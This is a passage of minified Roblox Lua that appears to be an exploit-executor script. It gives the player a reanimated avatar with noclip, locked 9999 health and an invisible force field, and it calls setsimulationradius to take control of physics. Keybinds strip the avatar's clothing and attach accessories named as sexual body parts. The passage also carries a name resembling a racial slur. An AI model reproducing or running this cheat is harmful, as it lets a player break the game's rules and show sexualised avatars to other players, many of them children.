sound=CreateSound2("1430568042",Torso,10,1,false)game:GetService("Debris"):AddItem(sound,5)wait(0.5)dS=false;li.Enabled=true;coroutine.resume(coroutine.create(function()wait(0.3)li.Enabled=false;game:GetService("Debris"):AddItem(li,2)end))lj:Destroy()kh=false end end end;if dr=="c"and kj==false and dS==false and kf==false then dS=true;RootPart.Anchored=true;kj=true;kf=true;for T=0,0.3,0.1 do SetTween(hI,{C0=CFrame.fromEulerAnglesXYZ(-1.57,0,2.8)},"Quad","InOut",0.1)SetTween(LH,{C0=CFrame.new(-.5,-.95+.05,0)*angles(0,0,math.rad(-5))},"Quad","InOut",0.1)SetTween(RH,{C0=CFrame.new(.5,-.95+.05,0)*angles(0,0,math.rad(5))},"Quad","InOut",0.1)SetTween(LW,{C0=CFrame.new(-1.5,0.4,-.0)*angles(0,0,math.rad(10))},"Quad","InOut",0.1)SetTween(RW,{C0=CFrame.new(1.5,0.4,-.0)*angles(0,0,math.rad(-10))},"Quad","InOut",0.1)Swait()end;for T=0,0.3,0.1 do SetTween(hI,{C0=CFrame.fromEulerAnglesXYZ(-1.57,0,2.8)*CFrame.new(0,0,-0.1)*angles(math.rad(20),math.rad(0),math.rad(0))},"Quad","InOut",0.1)SetTween(LH,{C0=CFrame.new(-.5,-.95+.05,0)*angles(math.rad(20),0,math.rad(-5))},"Quad","InOut",0.1)SetTween(RH,{C0=CFrame.new(.5,-.95+.05,0)*angles(math.rad(20),0,math.rad(5))},"Quad","InOut",0.1)SetTween(LW,{C0=CFrame.new(-1.5,0.4,-.0)*angles(0,0,math.rad(10))},"Quad","InOut",0.1)SetTween(RW,{C0=CFrame.new(1.5,0.4,-.0)*angles(0,0,math.rad(-10))},"Quad","InOut",0.1)Swait()end;local lo=true;for T=0,0.6,0.1 do SetTween(hI,{C0=CFrame.fromEulerAnglesXYZ(-1.57,0,2.8)*CFrame.new(0,0,-0.3)*angles(math.rad(40),math.rad(0),math.rad(0))},"Quad","InOut",0.1)SetTween(LH,{C0=CFrame.new(-.5,-.95+.05,0)*angles(math.rad(40),0,math.rad(-5))},"Quad","InOut",0.1)SetTween(RH,{C0=CFrame.new(.5,-.95+.05,0)*angles(math.rad(40),0,math.rad(5))},"Quad","InOut",0.1)SetTween(LW,{C0=CFrame.new(-1.5,0.4,0.2)*angles(math.rad(30),0,math.rad(10))},"Quad","InOut",0.1)SetTween(RW,{C0=CFrame.new(1.5,0.4,0.2)*angles(math.rad(30),0,math.rad(-10))},"Quad","InOut",0.1)SetTween(kl,{C0=CFrame.new(0,-0.6,0)},"Quad","InOut",0.1)SetTween(km,{C0=CFrame.new(0,-0.6,0)},"Quad","InOut",0.1)if lo==true then lo=false;for T,v in pairs(kp:GetChildren())do if v:IsA("BasePart")then v.Transparency=1 end end end;Swait()end;for T=0,1,0.1 do SetTween(LW,{C0=CFrame.new(-1.5,0,0)*angles(math.rad(30),0,math.rad(10))},"Quad","InOut",0.1)SetTween(RW,{C0=CFrame.new(1.5,0,0)*angles(math.rad(30),0,math.rad(-10))},"Quad","InOut",0.1)SetTween(kl,{C0=CFrame.new(0,0.8,0)},"Quad","InOut",0.1)SetTween(km,{C0=CFrame.new(0,0.8,0)},"Quad","InOut",0.1)Swait()end;LocalPlayer.Character=M;for U,v in pairs(M:GetChildren())do if v:IsA("Pants")then v:Destroy()end end;for U,v in pairs(game:GetService("Workspace").nigra:GetChildren())do if v:IsA("Pants")then v:Destroy()end end;LocalPlayer.Character=FakeChar;RootPart.Anchored=false;dS=false;kj=false;R.vaggie.Handle.Anchored=false;S.lips.Handle.Anchored=false;W(R.vaggie.Handle,Character["Torso"])W(S.lips.Handle,Character["Torso"])S.lips.Handle.Attachment.Rotation=Vector3.new(-58,-177,180)Character:WaitForChild("Torso"):FindFirstChild("Attachment").Name="Attachment69"Character:WaitForChild("Torso"):FindFirstChild("Attachment").Name="Attachment1337"Character:WaitForChild("Torso"):FindFirstChild("Attachment").Name="Attachment420"Character:WaitForChild("Torso").Attachment1337.Position=Vector3.new(0,-1,0)Character:WaitForChild("Torso").Attachment420.Position=Vector3.new(0,-1.325,-0.22)elseif dr=="c"and dS==false and kf==true then end;if dr=="v"and dS==false and kg==false then kg=true;local lp=Instance.new("ParticleEmitter")lp.Parent=Character.TorsoYes.Torso.REF;lp.Speed=NumberRange.new(0.5,0.5)lp.Rotation=NumberRange.new(0,360)lp.Enabled=true;lp.Texture="rbxassetid://244221440"lp.Transparency=NumberSequence.new(0.89999997615814,0.89999997615814)lp.ZOffset=5;lp.Acceleration=Vector3.new(0,1,0)lp.Lifetime=NumberRange.new(0.10000000149012,0.20000000298023)lp.Rate=20000;lp.RotSpeed=NumberRange.new(-30,30)lp.SpreadAngle=Vector2.new(360,360)lp.VelocitySpread=360;local li=Instance.new("ParticleEmitter")li.Parent=Character.TorsoYes.Torso.Out;li.Speed=NumberRange.new(0.5,0.5)li.Rotation=NumberRange.new(0,360)li.Enabled=true;li.Texture="rbxassetid://244221440"li.Transparency=NumberSequence.new(0.89999997615814,0.89999997615814)li.ZOffset=5;li.Acceleration=Vector3.new(0,1,0)li.Lifetime=NumberRange.new(0.10000000149012,0.20000000298023)li.Rate=20000;li.RotSpeed=NumberRange.new(-30,30)li.SpreadAngle=Vector2.new(360,360)li.VelocitySpread=360;for T,v in pairs(Character.TorsoYes.Torso:GetChildren())do if v.Name=="Chest"or v.Name=="Chest2"then local lq=Instance.new("ParticleEmitter")lq.Parent=v;lq.Speed=NumberRange.new(0.5,0.5)lq.Rotation=NumberRange.new(0,360)lq.Enabled=true;lq.Texture="rbxassetid://244221440"lq.Transparency=NumberSequence.new(0.89999997615814,0.89999997615814)lq.ZOffset=5;lq.Acceleration=Vector3.new(0,1,0)lq.Lifetime=NumberRange.new(0.10000000149012,0.20000000298023)lq.Rate=20000;lq.RotSpeed=NumberRange.new(-30,30)lq.SpreadAngle=Vector2.new(360,360)lq.VelocitySpread=360;v.Transparency=0;v.Anchored=false;v.CanCollide=false;coroutine.resume(coroutine.create(function()wait(0.2)lq.Enabled=false end))elseif v:IsA("Beam")then game:GetService("Debris"):AddItem(v,0.2)end end;for T,v in pairs(Character.TorsoYes.Torso:GetChildren())do if v:IsA("BasePart")and v.Name~="Chest"then v.Transparency=1 end end;for T,v in pairs(Character.LArmYes.LeftArm:GetChildren())do if v:IsA("BasePart")and v.Name~="REF"then v.Transparency=1 end end;for T,v in pairs(Character.RArmYes.RightArm:GetChildren())do if v:IsA("BasePart")and v.Name~="REF"then v.Transparency=1 end end;Torso.Transparency=0;LocalPlayer.Character=M;for U,v in pairs(M:GetChildren())do if v:IsA("Shirt")then v:Destroy()end end;for U,v in pairs(game:GetService("Workspace").nigra:GetChildren())do if v:IsA("Shirt")then v:Destroy()end end;LocalPlayer.Character=FakeChar;wait(0.2)lp.Enabled=false;li.Enabled=false;game:GetService("Debris"):AddItem(lp,2)game:GetService("Debris"):AddItem(li,2)R.tiddie.Handle.Anchored=false;R.othertiddie.Handle.Anchored=false;S.nipples.Handle.Anchored=false;R.behindzatiddie.Handle.Anchored=false;R.behindzaothertiddie.Handle.Anchored=false;W(R.tiddie.Handle,Character.TorsoYes.Torso.Chest1)W(R.othertiddie.Handle,Character.TorsoYes.Torso.Chest2)W(S.nipples.Handle,Character.TorsoYes.Torso.Chest3)W(R.behindzatiddie.Handle,Character.TorsoYes.Torso.Chest3)W(R.behindzaothertiddie.Handle,Character.TorsoYes.Torso.Chest4)S.nipples.Handle.Attachment.Orientation=Vector3.new(-25,90,-45)Character:WaitForChild("TorsoYes").Torso.Chest1:FindFirstChild("Attachment").Name="Attachment69"Character:WaitForChild("TorsoYes").Torso.Chest2:FindFirstChild("Attachment").Name="Attachment69"Character:WaitForChild("TorsoYes").Torso.Chest3:FindFirstChild("Attachment").Name="Attachment69"Character:WaitForChild("TorsoYes").Torso.Chest3:FindFirstChild("Attachment").Name="Attachment420"Character:WaitForChild("TorsoYes").Torso.Chest4:FindFirstChild("Attachment").Name="Attachment69"Character:WaitForChild("TorsoYes").Torso.Chest1.Attachment69.Position=Vector3.new(0,0,0)Character:WaitForChild("TorsoYes").Torso.Chest2.Attachment69.Position=Vector3.new(0,0,0)Character:WaitForChild("TorsoYes").Torso.Chest3.Attachment69.Position=Vector3.new(0.3,0.2,-0.425)Character:WaitForChild("TorsoYes").Torso.Chest3.Attachment420.Position=Vector3.new(0,0,0)Character:WaitForChild("TorsoYes").Torso.Chest4.Attachment69.Position=Vector3.new(0,0,0)kk=false elseif dr=="v"and dS==false and kg==true then end;if dr=="p"and dS==false then if mememode==false then mememode=true;dZ="http://www.roblox.com/asset/?id=836590183"lastsongpos=0;d_.TimePosition=lastsongpos else mememode=false;e0=e0-1;KeyDownF("n")end end;if dr=="0"then if isruning==false then isruning=true end end;if dr=="m"then if playsong==true then playsong=false;d_:pause()elseif playsong==false then playsong=true;d_:resume()end end;if dr=="n"and mememode==false then e0=e0+1;if e0>6 then e0=1 end;warn("now playing song Nr"..e0)if e0==1 then dZ="http://www.roblox.com/asset/?id=617334987"elseif e0==2 then dZ="http://www.roblox.com/asset/?id=3464477488"elseif e0==3 then dZ="http://www.roblox.com/asset/?id=198665867"elseif e0==4 then dZ="http://www.roblox.com/asset/?id=493674525"elseif e0==5 then dZ="http://www.roblox.com/asset/?id=2984966954"elseif e0==6 then dZ="http://www.roblox.com/asset/?id=3547074406"end;lastsongpos=0;d_.TimePosition=lastsongpos end end)FF=Instance.new("ForceField",Character)FF.Visible=false;Humanoid.DisplayDistanceType="None"Humanoid.MaxHealth=9999;Humanoid.Health=9999;GainCharge=function()Humanoid.MaxHealth=9999;Humanoid.Health=9999 end;Humanoid.HealthChanged:connect(function()GainCharge(Humanoid)end)coroutine.resume(coroutine.create(function()while Humanoid.Health>0.001 do dQ=dQ+dR;hitfloor=rayCast(RootPart.Position,CFrame.new(RootPart.Position,RootPart.Position-Vector3.new(0,1,0)).lookVector,4,Character)if Character:FindFirstChild("Sound")then Character:FindFirstChild("Sound"):Destroy()end;local hW=(Humanoid.MoveDirection*Vector3.new(1,0,1)).magnitude;local hX=RootPart.Velocity.y;if RootPart.Velocity.y>1 and hitfloor==nil then N="Jump"elseif RootPart.Velocity.y<-1 and hitfloor==nil then N="Fall"elseif Humanoid.Sit==true then N="Sit"elseif hW<.5 and hitfloor~=nil then N="Idle"elseif hW>.5 and hitfloor~=nil then N="Walk"else N=""end;local hY=RootPart.CFrame;local hZ=Humanoid.MoveDirection*hY.LookVector;local h_=Humanoid.MoveDirection*hY.RightVector;dU=hZ.X+hZ.Z;dV=h_.X+h_.Z;coroutine.resume(coroutine.create(function()if d_.Parent==nil or d_==nil then d_=e1:Clone()d_.Parent=Torso;d_.Name="BGMusic"d_.Pitch=1;d_.Volume=1.5;d_.Looped=true;d_.archivable=false;d_.TimePosition=lastsongpos;if playsong==true then d_:play()elseif playsong==false then d_:stop()end else lastsongpos=d_.TimePosition;d_.Pitch=1;d_.Volume=1.5;d_.Looped=true;d_.SoundId=dZ;d_.EmitterSize=30 end end))dO=hW*1;if dO>30 then dO=30 end;dO=dO/50*2;if dS==false then if N=="Jump"then dR=0.60*2;SetTween(hI,{C0=RootCF*cn(0,0+0.0395/2*math.cos(dQ/8),-0.1+0.0395*math.cos(dQ/8))*angles(math.rad(-6.5-1.5*math.cos(dQ/8))+dO*dU/2,math.rad(0)-dO*dV/2,math.rad(0))},"Quad","Out",0.25)SetTween(hJ,{C0=NeckCF*CFrame.new(0,0,0)*angles(math.rad(-26.5+2.5*math.cos(dQ/8)),math.rad(0),math.rad(-0))},"Quad","Out",0.25)SetTween(RW,{C0=cf(1.4+.05*math.cos(dQ/8),0.5+.05*math.cos(dQ/8),.0)*angles(math.rad(140-2*math.cos(dQ/8)),math.rad(-5),math.rad(8+4*math.cos(dQ/8)))},"Quad","Out",0.2)SetTween(LW,{C0=cf(-1.4+.05*math.cos(dQ/8),0.5+.05*math.cos(dQ/8),.0)*angles(math.rad(140-2*math.cos(dQ/8)),math.rad(5),math.rad(-8-4*math.cos(dQ/8)))},"Quad","Out",0.2)SetTween(RH,{C0=CFrame.new(.5,-0.85+.05*math.cos(dQ/15),-.2)*CFrame.Angles(math.rad(-15-1*math.cos(dQ/10)),math.rad(0),math.rad(0))},"Quad","InOut",0.075)SetTween(LH,{C0=CFrame.new(-.5,-0.35+.05*math.cos(dQ/15),-.4)*CFrame.Angles(math.rad(-25+1*math.cos(dQ/10)),math.rad(0),math.rad(0))},"Quad","InOut",0.075)elseif N=="Fall"then dR=0.60*2;SetTween(hI,{C0=RootCF*cn(0,0+0.0395/2*math.cos(dQ/8),-0.5+0.0395*math.cos(dQ/8))*angles(math.rad(5.5-1.5*math.cos(dQ/8))-dO*dU/2,math.rad(0)+dO*dV/2,math.rad(0))},"Quad","Out",0.35)SetTween(hJ,{C0=NeckCF*CFrame.new(0,0,0)*angles(math.rad(26.5+2.5*math.cos(dQ/8)),math.rad(0),math.rad(-0))},"Quad","Out",0.25)SetTween(RW,{C0=cf(1.4+.05*math.cos(dQ/8),0.5+.05*math.cos(dQ/8),.0)*angles(math.rad(105-2*math.cos(dQ/8)),math.rad(-15),math.rad(80+4*math.cos(dQ/8)))},"Quad","Out",0.2)SetTween(LW,{C0=cf(-1.4+.05*math.cos(dQ/8),0.5+.05*math.cos(dQ/8),.0)*angles(math.rad(105-2*math.cos(dQ/8)),math.rad(15),math.rad(-80-4*math.cos(dQ/8)))},"Quad","Out",0.2)SetTween(RH,{C0=CFrame.new(.5,-0.15+.05*math.cos(dQ/15),-.4)*CFrame.Angles(math.rad(-15-1*math.cos(dQ/10)),math.rad(0),math.rad(0))},"Quad","InOut",0.1)SetTween(LH,{C0=CFrame.new(-.5,-0.55+.05*math.cos(dQ/15),-.4)*CFrame.Angles(math.rad(-0+1*math.cos(dQ/10)),math.rad(0),math.rad(0))},"Quad","InOut",0.1)elseif N=="Idle"then local f2=1;if dS==true and mememode==true then f2=5 end;if ke==false then dR=0.60*1.75*f2;Humanoid.JumpPower=60;Humanoid.WalkSpeed=16;local i0=0;SetTween(hI,{C0=RootCF*cn(0,0,-0.1+0.0395*math.cos(dQ/8+i0*math.cos(dQ/8*2)))*angles(math.rad(1.5-1*math.cos(dQ/8)),math.rad(0+0*math.cos(dQ/8)/20),math.rad(-20))},"Quad","InOut",0.1)SetTween(hJ,{C0=NeckCF*angles(math.rad(6.5-3.5*math.sin(dQ/8+i0*math.cos(dQ/8*2))),math.rad(2.5-5.5*math.cos(dQ/16)),math.rad(20-6.5*math.cos(dQ/15+.4*math.cos(dQ/10))))},"Quad","InOut",0.1)SetTween(RW,{C0=cf(1.45+.0*math.cos(dQ/8),0.5+.05*math.cos(dQ/8),.0)*angles(math.rad(0+3*math.sin(dQ/8)),math.rad(-5),math.rad(4+4*math.cos(dQ/8)))},"Quad","Out",0.2)SetTween(LW,{C0=cf(-1.45+.0*math.cos(dQ/8),0.5+.05*math.cos(dQ/8),.0)*angles(math.rad(0+3*math.sin(dQ/8)),math.rad(5),math.rad(-4-4*math.cos(dQ/8)))},"Quad","Out",0.2)SetTween(RH,{C0=CFrame.new(.5,-0.95-.04*math.cos(dQ/8+i0*math.cos(dQ/8*2)),0)*CFrame.Angles(math.rad(1.5-1*math.cos(dQ/8)),math.rad(0),math.rad(2.5-0.0*math.cos(dQ/8)))},"Quad","InOut",0.1)SetTween(LH,{C0=CFrame.new(-.5,-0.95-.04*math.cos(dQ/8+i0*math.cos(dQ/8*2)),0)*CFrame.Angles(math.rad(1.5-1*math.cos(dQ/8)),math.rad(20),math.rad(-2.5-0.0*math.cos(dQ/8)))},"Quad","InOut",0.1)else dR=0.60*1.75*f2;Humanoid.JumpPower=60;Humanoid.WalkSpeed=16;local i0=0;SetTween(hI,{C0=RootCF*cn(0,0,-0.1+0.0395*math.cos(dQ/8+i0*math.cos(dQ/8*2)))*angles(math.rad(10.5-1*math.cos(dQ/8)),math.rad(0+0*math.cos(dQ/8)/20),math.rad(-5))},"Quad","InOut",0.1)SetTween(hJ,{C0=NeckCF*angles(math.rad(-6.5-3.5*math.sin(dQ/8+i0*math.cos(dQ/8*2))),math.rad(2.5-5.5*math.cos(dQ/16)),math.rad(5-6.5*math.cos(dQ/15+.4*math.cos(dQ/10))))},"Quad","InOut",0.1)SetTween(RW,{C0=cf(1.45+.0*math.cos(dQ/8),0.5+.05*math.cos(dQ/8),.0)*angles(math.rad(10+3*math.sin(dQ/8)),math.rad(25),math.rad(40+4*math.cos(dQ/8)))},"Quad","Out",0.2)SetTween(LW,{C0=cf(-1.45+.0*math.cos(dQ/8),0.5+.05*math.cos(dQ/8),.0)*angles(math.rad(10+3*math.sin(dQ/8)),math.rad(-25),math.rad(-40-4*math.cos(dQ/8)))},"Quad","Out",0.2)SetTween(RH,{C0=CFrame.new(.5,-0.95-.04*math.cos(dQ/8+i0*math.cos(dQ/8*2)),0)*CFrame.Angles(math.rad(20.5-1*math.cos(dQ/8)),math.rad(0),math.rad(2.5-0.0*math.cos(dQ/8)))},"Quad","InOut",0.1)SetTween(LH,{C0=CFrame.new(-.5,-0.95-.04*math.cos(dQ/8+i0*math.cos(dQ/8*2)),0)*CFrame.Angles(math.rad(1.5-1*math.cos(dQ/8)),math.rad(20),math.rad(-2.5-0.0*math.cos(dQ/8)))},"Quad","InOut",0.1)end elseif N=="Walk"then if ke==false then local speed=1.0;if mememode==true then speed=4 end;dR=2.4*speed;Humanoid.JumpPower=60*speed;Humanoid.WalkSpeed=16*speed;local i1=cf(-dV/7*math.cos(dQ/8),0,dU/7*math.cos(dQ/8))*angles(math.rad(-dU*30)*math.cos(dQ/8),0,math.rad(-dV*30)*math.cos(dQ/8))local i2=cf(dV/7*math.cos(dQ/8),0,-dU/7*math.cos(dQ/8))*angles(math.rad(dU*30)*math.cos(dQ/8),0,math.rad(dV*30)*math.cos(dQ/8))SetTween(hI,{C0=RootCF*CFrame.new(0,0,-0.05+0.055*math.cos(dQ/4)+-math.sin(dQ/4)/8)*angles(math.rad((dU*2-dU*math.cos(dQ/4))*7),math.rad((-dV*2- -dV*math.cos(dQ/4))*5),math.rad(8*math.cos(dQ/8)))},"Linear","InOut",WalkAnimMove/speed)SetTween(hJ,{C0=NeckCF*CFrame.new(0,0,0+0.025*math.cos(dQ/4))*angles(math.rad((-dU*1- -dU*math.cos(dQ/4))*7),math.rad((dV*2-dV*math.cos(dQ/4))*3.5),math.rad(-dV*45+-8*math.cos(dQ/8)))},"Linear","InOut",WalkAnimMove/speed)SetTween(RW,{C0=cf(1.45+.0*math.cos(dQ/8),0.5+dV/50*math.cos(dQ/8),0)*angles(math.rad(0+dU*15*math.cos(dQ/8)),math.rad(0),math.rad(8+dV*5*math.cos(dQ/8)))},"Linear","Out",WalkAnimMove/speed)SetTween(LW,{C0=cf(-1.45+.0*math.cos(dQ/8),0.5+dV/50*math.cos(dQ/8),0)*angles(math.rad(0-dU*15*math.cos(dQ/8)),math.rad(0),math.rad(-8-dV*5*math.cos(dQ/8)))},"Linear","Out",WalkAnimMove/speed)SetTween(RH,{C0=CFrame.new(.5,-0.85+.15*math.sin(dQ/8),-.15+.15*math.cos(dQ/8))*i1*CFrame.Angles(math.rad(0-5*math.cos(dQ/8)),math.rad(0),math.rad(2.5-0.0*math.cos(dQ/8)))},"Linear","InOut",WalkAnimMove/speed)SetTween(LH,{C0=CFrame.new(-.5,-0.85-.15*math.sin(dQ/8),-.15-.15*math.cos(dQ/8))*i2*CFrame.Angles(math.rad(0+5*math.cos(dQ/8)),math.rad(0),math.rad(-2.5-0.0*math.cos(dQ/8)))},"Linear","InOut",WalkAnimMove/speed)else local speed=1.6;if mememode==true then speed=4 end;dR=2.5*speed;Humanoid.JumpPower=60*speed;Humanoid.WalkSpeed=22*speed;local i1=cf(-dV/7*math.cos(dQ/8),0,dU/7*math.cos(dQ/8))*angles(math.rad(dU*89)*math.cos(dQ/8),mr(-dV*55/2*math.cos(dQ/8)),math.rad(dV*55/1*math.cos(dQ/8)))local i2=cf(dV/7*math.sin(dQ/8),0,-dU/7*math.cos(dQ/8))*angles(math.rad(dU*89)*math.cos(dQ/8),mr(dV*55/2*math.sin(dQ/8)),math.rad(-dV*55/1*math.sin(dQ/8)))SetTween(hI,{C0=RootCF*CFrame.new(dV*1*math.sin(dQ/8),dU*1*math.sin(dQ/8),-0.5-0.255*math.cos(dQ/8)+-math.sin(dQ/8)/8)*angles(math.rad(85+dU*math.cos(dQ/8)*20),math.rad(-dV*math.cos(dQ/4)*1),math.rad(-dV*math.cos(dQ/8)*10))},"Linear","InOut",WalkAnimMove/speed)SetTween(hJ,{C0=NeckCF*CFrame.new(0,0,0+0.025*math.cos(dQ/4))*angles(math.rad(-20+(-dU*1- -dU*math.cos(dQ/4))*5),math.rad((dV*2-dV*math.cos(dQ/4))*3.5),math.rad(-dV*45+-8*math.cos(dQ/8)))},"Linear","InOut",WalkAnimMove/speed)SetTween(RW,{C0=cf(1.0+.0*math.cos(dQ/8),.5-dU*0.5*math.sin(dQ/8),-.4)*angles(math.rad(95-dU*75*math.sin(dQ/8)),math.rad(0),math.rad(-8+-dV*55*math.sin(dQ/8)+10*math.cos(dQ/8)))},"Linear","Out",WalkAnimMove/speed)SetTween(LW,{C0=cf(-1.0+.0*math.cos(dQ/8),.5-dU*0.5*math.sin(dQ/8),-.4)*angles(math.rad(95-dU*75*math.sin(dQ/8)),math.rad(0),math.rad(8+dV*55*math.cos(dQ/8)-10*math.cos(dQ/8)))},"Linear","Out",WalkAnimMove/speed)SetTween(RH,{C0=CFrame.new(.5,-0.85-.25*math.sin(dQ/8),-.15-.25*math.sin(dQ/8))*i1*CFrame.Angles(math.rad(60-5*math.cos(dQ/8)),math.rad(0),math.rad(-2.5-0.0*math.cos(dQ/8)))},"Linear","InOut",WalkAnimMove/speed)SetTween(LH,{C0=CFrame.new(-.5,-0.85-.25*math.sin(dQ/8),-.15-.25*math.sin(dQ/8))*i2*CFrame.Angles(math.rad(60-5*math.sin(dQ/8)),math.rad(0),math.rad(2.5-0.0*math.sin(dQ/8)))},"Linear","InOut",WalkAnimMove/speed)SetTween(tailw,{C0=CF(0,0,.3)*ANGLES(mr(90+10*math.cos(dQ/8)),0,mr(20*math.cos(dQ/16)))},"Linear","In",.1)end elseif N=="Sit"then SetTween(hI,{C0=RootCF*CFrame.new(0,0,0)*angles(math.rad(0),math.rad(0),math.rad(0))},"Quad","InOut",0.1)SetTween(hJ,{C0=NeckCF*CFrame.new(0,0,0)*angles(math.rad(0),math.rad(0),math.rad(0))},"Quad","InOut",0.1)SetTween(RW,{C0=CFrame.new(1.5,0.5,-.0)*angles(math.rad(0),math.rad(0),math.rad(0))},"Quad","Out",0.1)SetTween(LW,{C0=CFrame.new(-1.5,0.5,-.0)*angles(math.rad(0),math.rad(0),math.rad(0))},"Quad","Out",0.1)SetTween(RH,{C0=CFrame.new(.5,-1,0)*angles(math.rad(90),math.rad(0),math.rad(0))},"Quad","InOut",0.1)SetTween(LH,{C0=CFrame.new(-.5,-1,0)*angles(math.rad(90),math.rad(0),math.rad(0))},"Quad","InOut",0.1)end end;if dS==false and not(ke==true and N=="Walk")then SetTween(tailw,{C0=tailc0*CF(0,.2,0)*ANGLES(mr(4+2*math.cos(dQ/8)),0,mr(20+20*math.cos(dQ/16)))},"Linear","In",.1)end;Swait(Animstep*30)end end))p=Character.RightClaw:GetChildren()for T=1,#p do p[T].Transparency=0 end;p=Character.LeftClaw:GetChildren()for T=1,#p do p[T].Transparency=0 end;wait(0.1)p=Character.RightClaw:GetChildren()for T=1,#p do p[T].Transparency=1 end;p=Character.LeftClaw:GetChildren()for T=1,#p do p[T].Transparency=1 end end)end;function Clickey8()local Player=game:GetService("Players").LocalPlayer;local lr=Player.Character;local L=game:GetService("Players").LocalPlayer.Name;local M=workspace:WaitForChild(L)local R={rightarm=lr:WaitForChild("Hat1"),leftarm=lr:WaitForChild("Pal Hair"),rightleg=lr:WaitForChild("LavanderHair"),leftleg=lr:WaitForChild("Pink Hair"),torso=lr:WaitForChild("Meshes/CrescentHornsAccessory")}local S={relaxative=lr:WaitForChild("EmotimaskRelax"),cyoot=lr:WaitForChild("EmotimaskCute"),bloosh=lr:WaitForChild("EmotimaskBlush"),fwuffyeaws=lr:WaitForChild("FluffyEars"),heir=lr:WaitForChild("Whispy Double Bun Bangs")}for T,v in next,R do v.Handle.AccessoryWeld:Remove()for U,V in next,v:GetDescendants()do if V:IsA("Mesh")or V:IsA("SpecialMesh")then V:Remove()end end end;for T,v in next,S do v.Handle.AccessoryWeld:Remove()end;local function W(T,v)local X=Instance.new("Attachment",T)X.Position=Vector3.new(0,0,0)local Y=Instance.new("Attachment",v)Y.Position=Vector3.new(0,0,0)local Z=Instance.new("AlignPosition",T)Z.Attachment0=X;Z.Attachment1=Y;Z.RigidityEnabled=false;Z.ReactionForceEnabled=false;Z.ApplyAtCenterOfMass=true;Z.MaxForce=9999999;Z.MaxVelocity=math.huge;Z.Responsiveness=2500;local _=Instance.new("AlignOrientation",T)_.Attachment0=X;_.Attachment1=Y;_.ReactionTorqueEnabled=true;_.PrimaryAxisOnly=false;_.MaxTorque=9999999;_.MaxAngularVelocity=math.huge;_.Responsiveness=2500 end;char=game:GetService("Players").LocalPlayer.Character;plr=game:GetService("Players").LocalPlayer;char.Archivable=true;bg2=char:Clone()bg2.Archivable=false;bg2.Name="Trash"bg2.Parent=char;health=game:GetService("Players").LocalPlayer.Character.Humanoid.Health;game:GetService("Players").LocalPlayer.Chatted:connect(function(P)b=bg2.Head:getChildren()for T=1,#b do if b[T].className=="Part"then b[T]:Destroy()end end;if P=="swap"then game:GetService("Players").LocalPlayer.Character=M.Trash;game:GetService("Workspace").Camera.CameraSubject=game:GetService("Players").LocalPlayer.Character end;if P=="back"then game:GetService("Players").LocalPlayer.Character=M;game:GetService("Workspace").Camera.CameraSubject=game:GetService("Players").LocalPlayer.Character end end)for U,c in pairs(bg2:GetChildren())do if c:IsA('Accessory')then c:Destroy()end end;coroutine.resume(coroutine.create(function()while true do wait(0.1)bg2["Head"].Transparency=1;bg2["Left Arm"].Transparency=1;bg2["Left Leg"].Transparency=1;bg2["Right Leg"].Transparency=1;bg2["Right Arm"].Transparency=1;bg2["Torso"].Transparency=1;bg2.Head.face.Transparency=1 end end))spawn(function()while true do wait()setsimulationradius(math.huge,math.huge)end end)local i3=false;local function i4()if i3==false and game:GetService("Players").LocalPlayer.Character~=nil then for U,i5 in pairs(game:GetService("Players").LocalPlayer.Character:GetDescendants())do if i5:IsA("BasePart")and i5.CanCollide==true then i5.CanCollide=false end end end end;Noclipping=game:GetService('RunService').Stepped:connect(i4)local RA=workspace[game:GetService("Players").LocalPlayer.Name]:FindFirstChild("Right Arm")or workspace[game:GetService("Players").LocalPlayer.Name]:FindFirstChild("RightUpperArm")local LA=workspace[game:GetService("Players").LocalPlayer.Name]:FindFirstChild("Left Arm")or workspace[game:GetService("Players").LocalPlayer.Name]:FindFirstChild("LeftUpperArm")local RL=workspace[game:GetService("Players").LocalPlayer.Name]:FindFirstChild("Right Leg")or workspace[game:GetService("Players").LocalPlayer.Name]:FindFirstChild("RightUpperLeg")local LL=workspace[game:GetService("Players").LocalPlayer.Name]:FindFirstChild("Left Leg")or workspace[game:GetService("Players").LocalPlayer.Name]:FindFirstChild("LeftUpperLeg")local i6=workspace[game:GetService("Players").LocalPlayer.Name]:FindFirstChild("Torso")or workspace[game:GetService("Players").LocalPlayer.Name]:FindFirstChild("UpperTorso")if workspace[game:GetService("Players").LocalPlayer.Name].Humanoid.RigType==Enum.HumanoidRigType.R15 then workspace[game:GetService("Players").LocalPlayer.Name].RightUpperArm["RightShoulder"]:Destroy()workspace[game:GetService("Players").LocalPlayer.Name].LeftUpperArm["LeftShoulder"]:Destroy()workspace[game:GetService("Players").LocalPlayer.Name].LeftUpperLeg["LeftHip"]:Destroy()workspace[game:GetService("Players").LocalPlayer.Name].RightUpperLeg["RightHip"]:Destroy()else workspace[game:GetService("Players").LocalPlayer.Name].Torso["Right Shoulder"]:Destroy()workspace[game:GetService("Players").LocalPlayer.Name].Torso["Left Shoulder"]:Destroy()workspace[game:GetService("Players").LocalPlayer.Name].Torso["Right Hip"]:Destroy()workspace[game:GetService("Players").LocalPlayer.Name].Torso["Left Hip"]:Destroy()end;local i7=game:GetObjects("rbxassetid://5508993607")[1]i7.Parent=workspace[game:GetService("Players").LocalPlayer.Name]i7.Name="BIGBOI"alignPosition=Instance.new("AlignPosition",RA)alignPosition.RigidityEnabled=false;alignPosition.ApplyAtCenterOfMass=false;alignPosition.MaxForce=9e9;alignPosition.MaxVelocity=9e99;alignPosition.ReactionForceEnabled=false;alignPosition.Responsiveness=9e99;alignOr=Instance.new("AlignOrientation",RA)alignOr.MaxTorque=9e99;alignOr.MaxAngularVelocity=9e99;alignOr.PrimaryAxisOnly=false;alignOr.ReactionTorqueEnabled=false;alignOr.Responsiveness=200;alignOr.RigidityEnabled=false;alignPosition=Instance.new("AlignPosition",LA)alignPosition.RigidityEnabled=false;alignPosition.ApplyAtCenterOfMass=false;alignPosition.MaxForce=9e9;alignPosition.MaxVelocity=9e99;alignPosition.ReactionForceEnabled=false;alignPosition.Responsiveness=9e99;alignOr=Instance.new("AlignOrientation",LA)alignOr.MaxTorque=9e99;alignOr.MaxAngularVelocity=9e99;alignOr.PrimaryAxisOnly=false;alignOr.ReactionTorqueEnabled=false;alignOr.Responsiveness=200;alignOr.RigidityEnabled=false;alignPosition=Instance.new("AlignPosition",LL)alignPosition.RigidityEnabled=false;alignPosition.ApplyAtCenterOfMass=false;alignPosition.MaxForce=9e9;alignPosition.MaxVelocity=9e99;alignPosition.ReactionForceEnabled=false;alignPosition.Responsiveness=9e99;alignOr